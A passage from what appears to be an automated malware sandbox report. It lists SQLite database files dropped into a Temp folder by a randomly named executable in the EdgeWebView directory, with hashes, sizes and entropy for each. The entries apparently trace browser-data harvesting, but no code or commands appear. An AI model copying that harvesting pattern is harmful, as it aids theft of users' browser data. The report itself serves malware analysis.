                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\DvbedNwAhh

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\DzYItapqvd

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\E4pRFJdNJS

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\E5tbYuFwQG

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\EDeQxTgf6W

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\EXDpAG3wTr

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\FHfVjQoP36

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Fi4PkF8q4Y

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\FogloetByw

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\GEG0NbCwUm

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\GFuDgGGqUi

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\GJLM3P0N4K

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\GeWUnVhZUJ

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\H1qUeyBve5

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\H5Yw9QYUkI

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\H7iwwOmNZr

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\HCSUAmoPKE

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\HtmQeLRe5z

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\HwyX57TT9R

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\I0WlgyCuKp

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\I1gx0UHbjY

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\IBWbdyMuEG

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
